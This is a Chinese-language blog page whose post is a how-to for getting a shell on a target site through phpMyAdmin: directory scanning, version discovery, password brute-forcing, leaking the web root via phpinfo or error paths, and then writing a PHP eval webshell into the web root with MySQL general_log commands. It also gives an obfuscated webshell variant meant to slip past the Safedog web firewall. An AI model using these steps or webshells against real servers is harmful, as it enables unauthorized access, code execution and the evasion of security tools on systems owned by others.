<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />




  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">






  <meta name="keywords" content="web安全,php," />





  <link rel="alternate" href="/atom.xml" title="Isleak's blog" type="application/atom+xml" />






<meta name="description" content="生活就是泥沙俱下，鲜花和荆棘并存。——毕淑敏">
<meta name="keywords" content="web安全,php">
<meta property="og:type" content="article">
<meta property="og:title" content="getshell技巧-phpMyAdmin的利用">
<meta property="og:url" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/index.html">
<meta property="og:site_name" content="Isleak&#39;s blog">
<meta property="og:description" content="生活就是泥沙俱下，鲜花和荆棘并存。——毕淑敏">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/1.png">
<meta property="og:image" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/2.png">
<meta property="og:image" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/3.png">
<meta property="og:image" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/4.png">
<meta property="og:image" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/5.png">
<meta property="og:updated_time" content="2018-11-25T11:16:05.885Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="getshell技巧-phpMyAdmin的利用">
<meta name="twitter:description" content="生活就是泥沙俱下，鲜花和荆棘并存。——毕淑敏">
<meta name="twitter:image" content="http://yoursite.com/2018/11/25/PHPMyAdmin利用/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"osition":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/25/PHPMyAdmin利用/"/>






  <title>getshell技巧-phpMyAdmin的利用 | Isleak's blog</title>
  








  <!-- 页面点击小红心 --> 
  <script type="text/javascript" src="/js/src/love.js"></script>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  

  <div class="container  page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Isleak's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Isleak's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/25/PHPMyAdmin利用/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="枭雄">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Isleak's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">getshell技巧-phpMyAdmin的利用</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-25T19:18:05+08:00">
                2018-11-25
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2018/11/25/PHPMyAdmin利用/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2018/11/25/PHPMyAdmin利用/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  763
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  3
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>生活就是泥沙俱下，鲜花和荆棘并存。——毕淑敏<br><a id="more"></a></p>
<h1 id="getshell的思路"><a href="#getshell的思路" class="headerlink" title="getshell的思路"></a>getshell的思路</h1><p>1、明确目标<br>2、信息收集<br>3、漏洞挖掘和利用</p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="明确路径"><a href="#明确路径" class="headerlink" title="明确路径"></a>明确路径</h2><p>利用目录扫描工具，对目标网站进行扫描，获取网站目录。常用工具有Kali中的DirBuster、dirb和wwwscan等。<br>我用的是Kali中的DirBuster，对目标进行扫描。<br><img src="/2018/11/25/PHPMyAdmin利用/1.png" alt="目录扫描结果"></p>
<h2 id="明确版本"><a href="#明确版本" class="headerlink" title="明确版本"></a>明确版本</h2><p>利用内置的文件，（…../phpMyAdmin/README）获取phpMyAdmin的版本信息。<br><img src="/2018/11/25/PHPMyAdmin利用/2.png" alt=""><br>一般网站管理员不会把这个目录删除，所以可以成为我们利用的一个点。</p>
<h2 id="明确登录口令"><a href="#明确登录口令" class="headerlink" title="明确登录口令"></a>明确登录口令</h2><p>有两种方法，手工和暴力破解。手工就是用一些弱口令进行猜解。<br>暴力破解可以用phpMyAdmin多线程批量破解工具来对phpMyAdmin进行暴力破解。<br><img src="/2018/11/25/PHPMyAdmin利用/3.png" alt="phpMyAdmin多线程批量破解工具"><br>但是工具只是给我们提供参考的，而且工具爆破对phpMyAdmin的版本有一定的要求。</p>
<h2 id="明确系统类型"><a href="#明确系统类型" class="headerlink" title="明确系统类型"></a>明确系统类型</h2><p>因为系统版本的不同，对权限的控制是不同的。Linux系统对权限的控制相对严格，而window则相对较为疏散的。所以说对window进行getshell相比Linux要容易。</p>
<h2 id="明确php版本和数据库版本"><a href="#明确php版本和数据库版本" class="headerlink" title="明确php版本和数据库版本"></a>明确php版本和数据库版本</h2><p>可以在phpMyAdmin的管理也可以看到php版本、MySQL版本，系统类型。<br><img src="/2018/11/25/PHPMyAdmin利用/4.png" alt="phpMyAdmin多线程批量破解工具"><br>因为php版本的差异，对渗透的利用是不一样的。</p>
<h1 id="获取网站真实路径"><a href="#获取网站真实路径" class="headerlink" title="获取网站真实路径"></a>获取网站真实路径</h1><h2 id="phpinfo-函数直接获取"><a href="#phpinfo-函数直接获取" class="headerlink" title="phpinfo()函数直接获取"></a>phpinfo()函数直接获取</h2><p>通过phpinfo.php或者phpinfo()进行获取网站真实路径。<br><img src="/2018/11/25/PHPMyAdmin利用/5.png" alt=""><br>phpinfo.php中会有大量的信息，有php版本、网站路径等。</p>
<h2 id="构造报错页面获取网站真实路径"><a href="#构造报错页面获取网站真实路径" class="headerlink" title="构造报错页面获取网站真实路径"></a>构造报错页面获取网站真实路径</h2><p>通过构造报错可能会报出网站的真实路径。常见的有页面访问报错、sql注入报错，文件包含报错。<br>phpmyadmin报错常见路径：<br>     /phpMyAdmin/libraries/lect_lang.lib.php<br>     /phpMyAdmin/index.php?lang[]=1<br>     /phpMyAdmin/phpinfo.php<br>     /phpMyAdmin/themes/darkblue_orange/layout.inc.php<br>     /phpMyAdmin/libraries/select_lang.lib.php<br>     /phpMyAdmin/libraries/lect_lang.lib.php<br>     /phpMyAdmin/libraries/mcrypt.lib.php</p>
<h2 id="借助搜索引擎"><a href="#借助搜索引擎" class="headerlink" title="借助搜索引擎"></a>借助搜索引擎</h2><p>借助搜索引擎，例如：百度、谷歌、fofa、shadon、zoomeye等，搜索关键字“error”,可能会报出网站的真实路径。</p>
<h1 id="漏洞挖掘和利用"><a href="#漏洞挖掘和利用" class="headerlink" title="漏洞挖掘和利用"></a>漏洞挖掘和利用</h1><h2 id="满足写shell的前提条件"><a href="#满足写shell的前提条件" class="headerlink" title="满足写shell的前提条件"></a>满足写shell的前提条件</h2><p>SHOW VARIABLES LIKE “%secure_file_priv%”;  查看读写文件路径 “secure_file_priv”对应的值不能为null，为null就不能正常写入shell。</p>
<h2 id="日志写shell"><a href="#日志写shell" class="headerlink" title="日志写shell"></a>日志写shell</h2><p>首先需要检测MySQL全局变量（general_log、general_log_file）的值。<br>general_log是日志保存状态，一共有两个值（ON/OFF）,ON代表开启，OFF代表关闭。<br>general_log_file是日志的保存路径<br>1、开启日志保存<br>      set global general_log=”ON”;<br>      set global general_log_file=”D:/phpStudy/WWW/infos.php”（网站真实路径）<br>2、写shell<br>      select  ‘&lt;?php eval($_POST[yumu)];?&gt;’<br>免杀（绕过安全狗）<br>      $arr = array(‘a’,’s’,’s’,’s’,’e’,’r’,’t’);<br>      $func = “”;<br>      for($i=0;$i&lt;count($arr);$i++){<br>      $func = $func.$arr[$i];<br>      }<br>      $func = substr($func,-6);<br>      $func($_REQUEST[‘c’]);</p>
<p>#总结<br>在利用phpMyAdmin来getshell时，需要注意对网站信息的收集，特别是网站的PHP版本、网站真实路径。这样才能更好的对网站就行漏洞挖掘。</p>
<h1 id="推荐文章"><a href="#推荐文章" class="headerlink" title="推荐文章"></a>推荐文章</h1><p><a href="https://xz.aliyun.com/t/2222" target="_blank" rel="noopener">从phpinfo到phpmyadmin的综合渗透利用</a></p>

      
    </div>
    
    
    

      <div>
        
          ﻿<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
        
      </div>
    
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/image/wechatpay.png" alt="枭雄 微信打赏"/>
        <p>微信打赏</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/image/alipay.jpg" alt="枭雄 支付宝打赏"/>
        <p>支付宝打赏</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
            <a href="/tags/php/" rel="tag"># php</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/11/最近的感想（一）/" rel="next" title="新的学习，新的征程">
                <i class="fa fa-chevron-left"></i> 新的学习，新的征程
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="枭雄" />
            
              <p class="site-author-name" itemprop="name">枭雄</p>
              <p class="site-description motion-element" itemprop="description">不积跬步无以至千里<br> 不积小流无以成江海</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/isleak" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.addon.pub/" title="Yokeen's blog" target="_blank">Yokeen's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://sec-redclub.com/index.php" title="红日攻防实验室" target="_blank">红日攻防实验室</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#getshell的思路"><span class="nav-number">1.</span> <span class="nav-text">getshell的思路</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#信息收集"><span class="nav-number">2.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#明确路径"><span class="nav-number">2.1.</span> <span class="nav-text">明确路径</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#明确版本"><span class="nav-number">2.2.</span> <span class="nav-text">明确版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#明确登录口令"><span class="nav-number">2.3.</span> <span class="nav-text">明确登录口令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#明确系统类型"><span class="nav-number">2.4.</span> <span class="nav-text">明确系统类型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#明确php版本和数据库版本"><span class="nav-number">2.5.</span> <span class="nav-text">明确php版本和数据库版本</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#获取网站真实路径"><span class="nav-number">3.</span> <span class="nav-text">获取网站真实路径</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#phpinfo-函数直接获取"><span class="nav-number">3.1.</span> <span class="nav-text">phpinfo()函数直接获取</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#构造报错页面获取网站真实路径"><span class="nav-number">3.2.</span> <span class="nav-text">构造报错页面获取网站真实路径</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#借助搜索引擎"><span class="nav-number">3.3.</span> <span class="nav-text">借助搜索引擎</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞挖掘和利用"><span class="nav-number">4.</span> <span class="nav-text">漏洞挖掘和利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#满足写shell的前提条件"><span class="nav-number">4.1.</span> <span class="nav-text">满足写shell的前提条件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#日志写shell"><span class="nav-number">4.2.</span> <span class="nav-text">日志写shell</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#推荐文章"><span class="nav-number">5.</span> <span class="nav-text">推荐文章</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">枭雄</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">4.7k</span>
  
</div>


<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
</div>
  <div class="powered-by">由 Hexo 强力驱动</div>




  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; NexT</div>





  <span class="post-meta-divider">|</span>


<div class="theme-info"> 
  <div class="powered-by"></div> 
  <span class="post-count">博客全站共 4.7k 字</span> 
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2018/11/25/PHPMyAdmin利用/';
          this.page.identifier = '2018/11/25/PHPMyAdmin利用/';
          this.page.title = 'getshell技巧-phpMyAdmin的利用';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
